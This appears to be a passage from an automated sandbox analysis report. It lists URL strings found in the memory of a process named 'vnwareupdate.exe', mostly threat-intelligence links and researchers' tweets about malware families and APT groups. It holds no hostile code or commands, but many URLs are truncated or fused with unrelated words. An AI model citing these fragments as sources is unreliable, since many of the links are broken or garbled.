Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://security.web.cern.ch/security/venom.shtmllVENOM
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-themlRegin
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-wa
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-waThe
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://sfkino.tistory.com/73
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://spamonmove.blogspot.co.uk/2017/01/email-on-10th-jan-2017-invoice-from.ht
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://sslbl.abuse.ch/intel/6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://st.drweb.com/static/new-www/news/2016/september/Investigation_of_Linux.M
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://st.drweb.com/static/new-www/news/2016/september/Investigation_of_Linux.MInvestigation
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://st.drweb.com/static/new-www/news/2016/september/Investigation_of_Linux.MThe
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://steemit.com/shadowbrokers/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://t.co/OLIj1yVJ4m
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: https://techhelplist.com/index.php/tech-tutorials/41-misc/444-aspr
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://techhelplist.com/index.php/tech-tutorials/41-misc/444-asprCVE-2017-0199:
Source: vnwareupdate.exe, 00000003.00000002.552214471.0000000003DA1000.00000004.00000001.sdmp	String found in binary or memory: https://techhelplist.com/index.php/tech-tutorials/41-misc/444-asprLinking
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.co
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/0x766c6164/status/794176576011309056
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/0xffff0800/status/1118406371165126656
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/BThurstonCPTECH/status/1128489465327030277
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/933280188733018113
Source: vnwareupdate.exe, 00000003.00000003.245855228.00000000039E7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/944926250161844224
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/944926250161844224Angler
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/944926250161844224Group5:
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/960924755355369472
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/960924755355369472MS15-078
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/960924755355369472Operation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/960924755355369472Sofacy
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ClearskySec/status/968104465818669057
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/DbgShell/status/1101076457189793793
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/DrunkBinary/status/1002587521073721346
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/DrunkBinary/status/1018448895054098432
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/DrunkBinary/status/982969891975319553
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ItsReallyNick/status/887705105239343104
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ItsReallyNick/status/975705759618158593
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ItsReallyNick/status/980915287922040832
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/James_inthe_box/status/1072116224652324870
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/JoKe_42/status/879693258183647232
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.238209992.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/JohnLaTwC/status/915590893155098629
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/JohnLaTwC/status/915590893155098629Locky
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/MarceloRivero/status/988455516094550017
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/RedDrip7/status/1145877272945025029
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/Voulnet/status/892104753295110145
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/abuse_ch/status/1145697917161934856
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/asfakian/status/1044859525675843585
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/blu3_team/status/955971742329135105
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/buffaloverflow/status/907728364278087680
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/buffaloverflow/status/908455053345869825
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/crai
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/crai(APT-C-23)
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/craiPetya
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/craiu/status/900314063560998912
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/craiu/status/959477129795731458
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/sta
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/1097423665472376832
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/1097423665472376832ASCS
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/1097423665472376832Bronze
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/1097423665472376832Temp.Periscope
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/1129647994603790338
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/945588042080899072
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237233008.00000000036C1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/9455880420808990728
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/9455880420808990729750018A94D020A3D16C91A9495A7EC0;Data-Stealing
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/945588042080899072Further
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/945588042080899072Lazarus
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyb3rops/status/945588042080899072e
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/cyberintproject/status/961714165550342146
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/danielhbohannon/status/877953970437844993
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/danielhbohannon/status/905096106924761088
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/demonslay335/status/876940273212895234
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/demonslay335/status/876940273212895234Ding
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/demonslay335/status/876940273212895234Karagany.B
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/demonslay335/status/876940273212895234New
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/demonslay335/status/876940273212895234Pcoka
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eya
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyaBanking
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyaNaoinstalad
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyaNew
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyad312ff06187c93d12dd5f1d0;FannyWorm
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/882497460102365185
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/885893685325574144Continued
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/885893685325574144Dimnie:
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/885893685325574144Shell
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/885893685325574144Tordow
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/900248754091167744Hellsing
Source: vnwareupdate.exe, 00000003.00000003.245614299.0000000003AA7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/920661179009241093
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eyalsela/status/92066117900924109328cTurla
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/haroonmeer/status/939099379834658817
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/infosecn1nja/status/1021399595899731968?s=12
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/itaitevet/status/1141677424045953024
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/jiriatvirlab/status/822601440317345792
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/malwareforme/status/915300883012870144
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/malwrhunterteam/status/953313514629853184
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/martin_u/status/880088927595638784
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/msftmmpc/status/877396932758560768
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/mzbat/status/895811803325898753
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/omri9741/status/991942007701598208
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/pwnallthethings/status/743230570440826886?lang=en
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/securitydoggo/status/936219272002654208
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/silv0123/status/1073072691584880640
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/stamparm/status/864865144748298242
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://virustotal.com/en/file/3d8a0c2d95e023a71f44bea2d04667ee06df5fd83d71eb5df
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://virustotal.com/en/file/3d8a0c2d95e023a71f44bea2d04667ee06df5fd83d71eb5dfAlmanah
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: https://vms.dataprotection.com.ua/virus/?i=13332788&virus_name=Trojan.Inject
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&amp
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&i=15421778
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&i=8400823
Source: vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&ampAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&ampAndroid
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&ampGhosts
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&ampLinux.Proxy.10
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.com/virus/?_is=1&ampTargeted
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.ru/virus/?
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://vms.drweb.ru/virus/?i=15059456
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://w00tsec.blogspot.fr/2016/09/luabot-malware-targeting-cable-modems.html
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://w00tsec.blogspot.fr/2016/09/luabot-malware-targeting-cable-modems.htmlDetecting
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://w00tsec.blogspot.fr/2016/09/luabot-malware-targeting-cable-modems.htmlLuaBot:
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://w00tsec.blogspot.fr/2016/09/luabot-malware-targeting-cable-modems.htmlPoS
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://w00tsec.blogspot.fr/2016/09/luabot-malware-targeting-cable-modems.htmlXAgentOSX:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e709407546
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://wikileaks.org/vault7/document/#archimedes
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://wikileaks.org/vault7/document/#archimedes.
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://wikileaks.org/vault7/document/#archimedesArchimedes
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://wikileaks.org/vault7/document/#archimedesGlobeImposter
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Ana
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc.
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc.p
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc/wWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc17WannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc50WannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc52WannaCry
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc8
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc8p
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researc96;APT10
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcAnother
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcF8WannaCry
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcThe
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcWannaCry
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcYayih
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcanWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcc.WannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researccuWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcd
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcdiWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcdoWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researce3;APT10
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurre
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurreA
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurreOkiru
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/arp-spoofing-used-to-insert-malic
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/arp-spoofing-used-to-insert-malicARP
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/arp-spoofing-used-to-insert-malicUpdated
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/botnet-bruteforcing-point-of-saleAided
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/botnet-bruteforcing-point-of-saleBotnet
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/botnet-bruteforcing-point-of-saleKIVARS
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/lockcrypt-ransomware-spreading-vi
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/lockcrypt-ransomware-spreading-viLockCrypt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/lockcrypt-ransomware-spreading-viRecent
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/lockcrypt-ransomware-spreading-viYx
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-research/targeted-attacks-against-tibet-or
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcjsWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcnsWannaCry
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.alienvault.com/blogs/labs-researcpsWannaCry
